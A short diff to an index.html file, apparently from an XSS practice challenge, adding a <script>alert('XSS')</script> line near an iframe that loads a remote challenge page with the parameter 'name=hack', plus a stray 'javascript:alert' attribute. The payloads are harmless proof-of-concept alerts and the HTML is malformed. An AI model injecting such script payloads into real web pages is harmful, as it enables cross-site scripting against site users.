--- a/index.html
+++ b/index.html
@@ -1,4 +1,5 @@
 
+<script>alert('XSS')</script>
 <iframe src="http://54.37.156.50:5000/xss5?name=hack"
 height="800" width="800" id="reto">
 src=javascript:alert('XSS')
